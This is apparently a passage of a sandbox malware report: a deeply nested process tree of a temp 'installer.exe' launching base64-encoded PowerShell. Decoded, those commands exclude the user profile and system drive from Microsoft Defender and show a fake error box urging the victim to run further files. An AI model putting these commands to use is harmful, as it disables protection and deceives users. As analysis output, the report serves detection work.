        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1484
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        8⤵
        
        PID:1700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        9⤵
        
        PID:1828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        10⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1580
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        10⤵
        
        PID:2664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        11⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        11⤵
        
        PID:2340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        12⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        12⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1752
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:1248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        13⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        13⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        13⤵
        
        PID:836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        14⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        14⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1828
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        14⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        15⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        15⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        15⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        16⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        16⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        16⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        17⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3096
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        17⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        17⤵
        
        PID:3216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        18⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        18⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3332
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        18⤵
        
        PID:3380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        19⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        19⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3440
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        19⤵
        
        PID:3528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        20⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        20⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3660
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        20⤵
        
        PID:3724
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        21⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        21⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        21⤵
        
        PID:3864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        22⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        22⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
